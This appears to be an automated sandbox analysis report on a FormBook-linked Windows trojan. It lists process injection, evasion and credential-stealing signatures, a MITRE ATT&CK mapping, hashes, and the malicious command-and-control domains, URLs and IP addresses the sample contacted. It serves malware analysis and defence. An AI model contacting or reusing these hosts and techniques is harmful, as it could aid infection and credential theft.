            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_81
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_XP
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_XPe
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_VISTA
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_7
            Source: 3T-ENQ-O-2024-10856.exe Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00CB91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00CB91DC
            Source: C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe Code function: 0_2_00CB96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00CB96E2
            MITRE ATT&CK matrix, listed per tactic column (numbers in parentheses are the counts shown beside a technique in the matrix):

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Native API (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
            Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
            Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1509340
            Sample: 3T-ENQ-O-2024-10856.exe
            Startdate: 11/09/2024
            Architecture: WINDOWS
            Score: 100

            Sample-level DNS/IP info: www.tigre777gg.online; www.mediaplug.biz; 7 other IPs or domains
            Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures

            Process tree:
            3T-ENQ-O-2024-10856.exe 3 (started)
              signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
              -> svchost.exe (started)
                 signatures: Maps a DLL or memory area into another process
                 -> CgEnKbPFVbMNeA.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    -> netbtugc.exe 13 (started)
                       signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                       -> CgEnKbPFVbMNeA.exe (injected)
                          DNS/IP info: www.independent200.org 103.42.108.46, ports 49719, 49720, 49721, SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU, Australia; www.mediaplug.biz 66.81.203.10, ports 49715, 49716, 49717, CONFLUENCE-NETWORK-INCVG, Virgin Islands (BRITISH); 2 other IPs or domains
                          signatures: Found direct / indirect Syscall (likely to bypass EDR)
                       -> firefox.exe (started)

            Source | Detection | Scanner | Label | Link
            3T-ENQ-O-2024-10856.exe | 34% | ReversingLabs
            3T-ENQ-O-2024-10856.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
            http://www.chamadaslotgiris.net/gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- | 0% | Avira URL Cloud | safe
            http://www.independent200.org/yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- | 0% | Avira URL Cloud | safe
            http://www.mediaplug.biz/osde/ | 0% | Avira URL Cloud | safe
            http://www.tigre777gg.online | 0% | Avira URL Cloud | safe
            http://www.independent200.org/yl6y/ | 0% | Avira URL Cloud | safe
            https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqv | 0% | Avira URL Cloud | safe
            http://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= | 0% | Avira URL Cloud | safe
            http://www.mediaplug.biz/osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- | 0% | Avira URL Cloud | safe
            http://www.masteriocp.online/p5rq/ | 0% | Avira URL Cloud | safe
            http://www.tigre777gg.online/06rp/ | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.independent200.org | 103.42.108.46 | true | true | | unknown
            chamadaslotgiris.net | 3.33.130.190 | true | true | | unknown
            dns.ladipage.com | 18.139.62.226 | true | true | | unknown
            tigre777gg.online | 3.33.130.190 | true | true | | unknown
            www.mediaplug.biz | 66.81.203.10 | true | true | | unknown
            www.linkbasic.net | unknown | unknown | true | | unknown
            www.masteriocp.online | unknown | unknown | true | | unknown
            www.chamadaslotgiris.net | unknown | unknown | true | | unknown
            www.tigre777gg.online | unknown | unknown | true | | unknown
                               Name | Malicious | Antivirus Detection | Reputation
                               http://www.masteriocp.online/p5rq/ | true | Avira URL Cloud: safe | unknown
                               http://www.independent200.org/yl6y/ | true | Avira URL Cloud: safe | unknown
                               http://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU= | true | Avira URL Cloud: safe | unknown
                               http://www.mediaplug.biz/osde/ | true | Avira URL Cloud: safe | unknown
                               http://www.mediaplug.biz/osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth- | true | Avira URL Cloud: safe | unknown
                               http://www.chamadaslotgiris.net/gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth- | true | Avira URL Cloud: safe | unknown
                               http://www.independent200.org/yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth- | true | Avira URL Cloud: safe | unknown
                               http://www.tigre777gg.online/06rp/ | true | Avira URL Cloud: safe | unknown
                               Name | Source | Malicious | Antivirus Detection | Reputation
                               https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                               http://www.tigre777gg.online | CgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                               https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqv | netbtugc.exe, 00000005.00000002.2600631900.00000000045A8000.00000004.10000000.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2600215728.00000000036B8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                               https://www.ecosia.org/newtab/ | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                               https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                               IP | Domain | Country | ASN | ASN Name | Malicious
                               18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
                               66.81.203.10 | www.mediaplug.biz | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
                               103.42.108.46 | www.independent200.org | Australia | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true
                               3.33.130.190 | chamadaslotgiris.net | United States | 8987 | AMAZONEXPANSIONGB | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1509340
                              Start date and time:2024-09-11 14:23:14 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 26s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                               Number of new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:3T-ENQ-O-2024-10856.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/3@6/4
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 53
                              • Number of non-executed functions: 292
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                               • Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • VT rate limit hit for: 3T-ENQ-O-2024-10856.exe
                               Time | Type | Description
                               08:25:41 | API Interceptor | 928492x Sleep call for process: netbtugc.exe modified
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               18.139.62.226
                               • Scan 00093847.exe | malicious | FormBook | context: www.masteriocp.online/wg84/
                               • DN.exe | malicious | FormBook | context: www.masteriocp.online/p5rq/
                               • DHL_497104778908.exe | malicious | FormBook | context: www.gaolibai.site/dk07/?hJ=D8pto4BPuzWD9&BZy=GDy9Ivf9UNaqrv9frjLto9uu2IkJerzBBeACnqJs3sHtDRLx3rmxpepnBsqEQrJHpKMtcSrveA==
                               • Arrival Notice.bat.exe | malicious | FormBook | context: www.againbeautywhiteskin.asia/3h10/
                               • SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe | malicious | FormBook, PureLog Stealer | context: www.hisako.store/e368/
                               103.42.108.46
                               • New Purchase Order.exe | malicious | FormBook | context: www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr
                               • Scan 00093847.exe | malicious | FormBook | context: www.mbwd.store/pn1r/
                               • LKkVS1VFJD.exe | malicious | FormBook | context: www.independent200.org/peuo/
                               • rRFQ.bat.exe | malicious | FormBook | context: www.mbwd.store/bmmx/
                               • REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | context: www.mbwd.store/pn1r/
                               • TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | context: www.mtmoriacolives.store/bkj6/
                               • 6ddrUd6iQo.exe | malicious | FormBook | context: www.eastcoastev.site/51n1/
                               • INV90097.exe | malicious | FormBook | context: www.anzskincare.xyz/n1ua/
                               • Electronic Order.exe | malicious | FormBook | context: www.dtalusering.com/la5g/
                               • Inquiry PR#27957.bat.exe | malicious | FormBook | context: www.dtalengineering.com/la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw
                               3.33.130.190
                               • DOC092024-0431202229487.exe | malicious | FormBook | context: www.doggieradio.net/hzuv/
                               • INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | context: www.digitalbloom.info/paa2/
                               • 8097600987765.exe | malicious | FormBook | context: www.shapenbuy.com/3ddr/
                               • PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | context: www.thewhitediamond.org/5hpf/
                               • September Order.exe | malicious | FormBook | context: www.sansensors.info/1hhl/
                               • PO#86637.exe | malicious | FormBook | context: www.autonashville.com/7d10/
                               • Jsn496Em5T.exe | malicious | FormBook | context: www.thewhitediamond.org/chud/
                               • MV ALIADO-S-REQ-19-000640.exe | malicious | FormBook | context: www.airights.info/8udz/
                               • PROFORMA INVOICE BKS-0121-24-25-JP240604.exe | malicious | FormBook | context: www.omexai.info/45sz/
                               • filz.exe | malicious | FormBook | context: www.globyglen.info/f4jh/?CB=56D/2OMVxsGldoxXdt4/5+YT3Tg5DYLVkxlzWzxnZK3OfEKbb6scc6EswMBS+UFsc09ekpwS55TcFwn96K5YRHXyIA0rVsBfoSg00AWGtZraXHwG7iVCMNE=&nfXl=ylNP
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               dns.ladipage.com
                               • New Purchase Order.exe | malicious | FormBook | context: 54.179.173.60
                               • Scan 00093847.exe | malicious | FormBook | context: 18.139.62.226
                               • z11SOAAUG2408.exe | malicious | FormBook | context: 13.228.81.39
                               • REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | context: 13.228.81.39
                               • DN.exe | malicious | FormBook | context: 18.139.62.226
                               • https://www.newbalancestore.asia/nb530.nh?utm_source=sale | malicious | Unknown | context: 13.228.81.39
                               • DHL_497104778908.exe | malicious | FormBook | context: 18.139.62.226
                               • Shipping Documents 7896424100.exe | malicious | FormBook | context: 13.228.81.39
                               • INV90097.exe | malicious | FormBook | context: 54.179.173.60
                               • PRE-ALERT HTHC22031529.exe | malicious | FormBook | context: 54.179.173.60
                               www.independent200.org
                               • LKkVS1VFJD.exe | malicious | FormBook | context: 103.42.108.46
                               www.mediaplug.biz
                               • Jsn496Em5T.exe | malicious | FormBook | context: 66.81.203.135
                               • 6i4QCFbsNi.exe | malicious | FormBook | context: 66.81.203.200
                               • Curriculum Vitae.exe | malicious | FormBook | context: 66.81.203.200
                               • z11SOAAUG2408.exe | malicious | FormBook | context: 66.81.203.200
                               • DN.exe | malicious | FormBook | context: 66.81.203.135
                               • Filename.exe | malicious | DarkTortilla, FormBook | context: 66.81.203.200
                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                               SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
                               • New Purchase Order.exe | malicious | FormBook | context: 103.42.108.46
                               • Scan 00093847.exe | malicious | FormBook | context: 103.42.108.46
                               • firmware.sh4.elf | malicious | Unknown | context: 103.27.32.30
                               • LKkVS1VFJD.exe | malicious | FormBook | context: 103.42.108.46
                               • http://www.greenprintlandscapes.com.au | malicious | Unknown | context: 110.232.143.97
                               • http://fslink.megnagroup.com.au/email/track/click?hash=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7Im11c3RoIjoiaHR0cHM6Ly9tZWduYWdyb3VwLmNvbS5hdS8iLCJsaW9uIjoiNzVkNGMiLCJnb3JpbGxhIjoiYmE1MDZjM2NlIiwidGlnZXIiOiJmc2xpbmsubWVnbmFncm91cC5jb20uYXUifSwiaWF0IjoxNzI0OTg3NTgyfQ.q2Cl712fuiOGcrrlV8jnMlRPUIhIoDJ0d2m4R_WTYLA~eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImhvcnNlIjoia2V2aW4uc21pdGhAc2FuaXRhcml1bS5jb20uYXUiLCJjYW1lbCI6ImJhNmM1MDlmZSJ9LCJpYXQiOjE3MjQ5ODc1ODJ9.KTlm-RKp1KYEIDipXUGHrWZz7AycFi0jesA9WqoLoig | malicious | Unknown | context: 110.232.143.78
                               • rRFQ.bat.exe | malicious | FormBook | context: 103.42.108.46
                               • REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | context: 103.42.108.46
                               • RFQ-HL51L05.exe | malicious | FormBook, PureLog Stealer | context: 110.232.143.114
                               • TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe | malicious | FormBook | context: 103.42.108.46
                               AMAZON-02US
                               • https://www.izmailovo.ru/contacts/ | malicious | HTMLPhisher | context: 54.195.103.155
                               • https://google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/Yp0Hz21d/bGF1cmVuLmNvaGVuQGJvYXJzaGVhZC5jb20==$%E3%80%82?safe=active | malicious | Unknown | context: 35.156.118.53
                               • http://email.friendbuy-mail.com/ls/click?upn=u001.8DvoQuH4u5PpaoiKqEq-2B9gjT1RnQAWIB6y8UcLzfbe53oufIOHmDfYdu6C6P6e3OEC2Aw0nU2F2H15JLKKYH0w-3D-3D4p02_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FDdnPYo6TRy4h3mM8HNTqUwSZO8hKXT-2FtDG93u3GX9X7qz54Yl0Q2XmTivXHYnoQBormkb-2FG3bQ-2FVuLKqMl82cXlNuvHa0jA7PJJXvRiIFqct1bOCE2NM4HG0BbvOTDGNTYI0FNj28b3h4C9dx6T3K7jMSTwy5OESQzYuaKBHUDqRRSZZ-2B3x2p8gJI9dqsfDOI-3D | malicious | HTMLPhisher | context: 18.239.18.33
                               • http://web-accessalerts.com.web-accessalerts.com/web-accessalerts.com/47bce5/3cfeedbc-cfaa-4637-abbf-8f7aa82f59be | malicious | Unknown | context: 13.227.219.18
                               • https://ad.doubleclick.net/ddm/clk/586708840;395014688;z | malicious | HTMLPhisher | context: 54.213.108.146
                               • https://arcg.is/1PqXT10 | malicious | Unknown | context: 52.222.214.69
                               • E240902 R0 Specserve-Fabrication and Supply of Gi Ducts.pdf | malicious | Unknown | context: 13.33.187.68
                               • https://Np8W.pivorixal.su/zbs3/?qrc=qa-sqi@qvcjp.com | malicious | HTMLPhisher | context: 34.251.82.109
                               • https://www.google.com/url?q=//www.google.com.br/amp/s/iKL5afRe0S6hy3p0slRKsXiNT5VzWqeGhx.desarrollodigitales.com/xiwitytevd/sotutybgetd/qoguhtunh/I6Gu0C/cWEtc3FpQHF2Y2pwLmNvbQ== | malicious | HTMLPhisher, Tycoon2FA | context: 13.33.187.68
                               • Wire-transaction073921.exe | malicious | SilverRat | context: 13.35.58.118
                               AMAZONEXPANSIONGB
                               • DOC092024-0431202229487.exe | malicious | FormBook | context: 3.33.130.190
                               • INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | context: 3.33.130.190
                               • https://arcg.is/1PqXT10 | malicious | Unknown | context: 3.33.220.150
                               • https://ledgerliveofficialsite.gitbook.io/ | malicious | Unknown | context: 52.223.40.198
                               • 8097600987765.exe | malicious | FormBook | context: 3.33.130.190
                               • PDF PURCHASE INQUIRY PDF.exe | malicious | FormBook | context: 3.33.130.190
                               • September Order.exe | malicious | FormBook | context: 3.33.130.190
                               • https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ== | malicious | HTMLPhisher | context: 3.33.220.150
                               • http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20Lutheran | malicious | Unknown | context: 52.223.40.198
                               • PO#86637.exe | malicious | FormBook | context: 3.33.130.190
                               CONFLUENCE-NETWORK-INCVG
                               • BCNFNjvJNq.exe | malicious | ADWIND, Lokibot, Ramnit, Sality | context: 204.11.56.48
                               • Jsn496Em5T.exe | malicious | FormBook | context: 66.81.203.135
                               • EGCS-875-S5-SMO M2A.exe | malicious | FormBook | context: 208.91.197.27
                               • OjKmJJm2YT.exe | malicious | Simda Stealer | context: 199.191.50.83
                               • 5AFlyarMds.exe | malicious | Simda Stealer | context: 199.191.50.83
                               • uB31aJH4M0.exe | malicious | Simda Stealer | context: 199.191.50.83
                               • M62eQtS9qP.exe | malicious | Simda Stealer | context: 208.91.196.145
                               • 6i4QCFbsNi.exe | malicious | FormBook | context: 66.81.203.200
                               • firmware.armv7l.elf | malicious | Unknown | context: 204.11.56.48
                               • firmware.i586.elf | malicious | Unknown | context: 204.11.56.48
                              No context
                              No context
                              Process:C:\Windows\SysWOW64\netbtugc.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.1209935793793442
                              Encrypted:false
                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                              MD5:214CFA91B0A6939C4606C4F99C9183B3
                              SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                              SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                              SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):287744
                              Entropy (8bit):7.993294359405002
                              Encrypted:true
                              SSDEEP:6144:EQsJoJg/J/1QaoCRzeFYu6ipL37jfnnbulNZ9mt6hF6d+xxIkx574U2eT:E9Js43vQnbulNPAK6d+vnxmUbT
                              MD5:8B92B295F99F1DEBF0C18AB4A336032E
                              SHA1:470FC9FE9205D17078390E7F4DE20F03BD1F1744
                              SHA-256:63B74B169D99018C2F6728B725DC29EA79BDAACC9FEA866593845FAF133C2EE4
                              SHA-512:AAF46146BF875D2FC3B5FADCEFBF490A95EA6C2FFD21E57629A21B1A3191E6305195CA6B58604CEF097B8027F09B8539DCD37343362FF8C70431B3951BACD894
                              Malicious:false
                              Reputation:low
